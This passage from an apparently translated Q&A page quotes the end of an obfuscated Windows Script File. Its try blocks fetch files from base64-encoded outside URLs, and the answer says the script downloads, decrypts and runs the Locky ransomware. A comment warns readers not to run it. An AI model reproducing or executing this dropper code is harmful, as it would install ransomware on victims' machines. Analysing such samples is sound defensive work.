}catch(votgorodazaspinoyiputkoroheuUxUroNK){} 
 
try{ 
 
Shtyler4("http://"+"ZGFwbWFmLnJlcHVibGlrYS5wbC9ueXgzN2Vj".manysecretthings() + "?KVDCLndNu=MyeVSkEaQbu","UHGobkAN"); 
 
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){} 
 
try{ 
 
Shtyler4("http://"+"cG9saWN5Zm9ybGlmZS5jb20vbnl4MzdlYw==".manysecretthings() + "?rxUfHtGu=TpywOYVN","jPYHJkr"); 
 
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){} 
 
]]></script> 
 
    
 
</job> 
 
</package>

+0

Если вы не на 100% уверены в содержании и происхождении, то не выполняйте код, и это включает в себя незакрепление. – zaph

ответ

0

В основном это файл сценария Windows, который загружает исполняемый файл из одного из трех закодированных URL-адресов, расшифровывает его, а затем запускает его. Исполняемый файл - это выкупщик Locky.

Смежные вопросы